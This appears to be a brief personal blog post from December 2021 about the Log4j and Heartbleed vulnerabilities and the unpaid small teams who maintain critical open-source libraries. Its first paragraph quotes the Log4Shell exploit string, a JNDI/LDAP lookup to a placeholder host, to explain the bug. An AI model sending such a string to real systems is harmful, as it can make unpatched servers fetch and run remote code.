the problem with open source

dec 15 2021


on November 24th, 2021, a bug was discovered in the open-source Java logging library Log4j that allowed attackers to potentially gain remote code execution simply by sending a certain string. obviously, having someone able to take control of your server simply by sending ${jndi:ldap://example.com/payload} isn't a good thing. the bug was patched upstream relatively quickly, but it's likely that knock-on effects of this vulnerability will be seen for months if not years to come, as patching enterprise software with layers and layers of legacy code surrounding it may be quite challenging.

a similar issue happened in April 2014, when a bug was discovered in the ubiquitous TLS library OpenSSL that allowed attackers to read data they shouldn't have been able to read. that bug was also patched rather quickly, and after a media frenzy of misinformation and confusion, faded into obscurity.

both of these bugs share a few traits, however. both are in libraries that are simple to implement but hard to replace, providing incredibly common functions that are almost completely necessary for the modern Internet to work, and both libraries are maintained by small teams who mostly do this work as volunteers. despite being integral to the core of modern society, these small teams generally go completely unnoticed, and generally don't get paid for what they do either.

@6thgrade4ever
Sep 2, 2021 3:57 PM
the most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named ronald who maintains a unix tool called 'runk' which stands for Ronald's Universal Number Kounter and handles all math for every machine on earth

in many ways, this is simply how modern open source works. small projects are taken and used by massive corporations without any compensation, but in return those corporations are required to release much of their own work openly as well. but just because something is released openly does not mean it can easily be compiled and used. have you ever tried to compile Android? many corporations seem to be taking advantage of this by letting people do all the hard work for them for free, and then just duct-taping everything together and slapping their logo on top.

still, I don't think I can imagine a way to make things work better.